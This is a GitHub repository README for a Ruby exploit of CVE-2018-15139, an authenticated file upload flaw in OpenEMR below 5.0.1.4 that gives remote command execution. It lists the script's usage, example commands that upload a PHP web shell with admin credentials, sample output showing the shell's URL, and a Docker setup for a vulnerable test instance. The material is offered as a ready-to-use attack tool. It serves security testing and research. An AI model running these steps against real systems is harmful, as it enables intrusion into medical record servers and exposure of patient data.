Skip to content

OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

License

Notifications You must be signed in to change notification settings

sec-it/exploit-CVE-2018-15139

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

OpenEMR CVE-2018-15139 exploit

OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Exploit for CVE-2018-15139.

Usage

$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Example

$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Requirements

Example using gem:

bundle install
# or
gem install httpx docopt

Docker deployment of the vulnerable software

Warning: of course this setup is not suited for production usage!

$ sudo docker-compose up

The upload folder permissions are broken in the official OpenEMR docker image, so it is required to connect to the container and fix the permissions, eg.:

$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

References

This is a better re-write EDB-49998.

The vulnerability was found by Project Insecurity.

Analysis of the original exploit and vulnerability: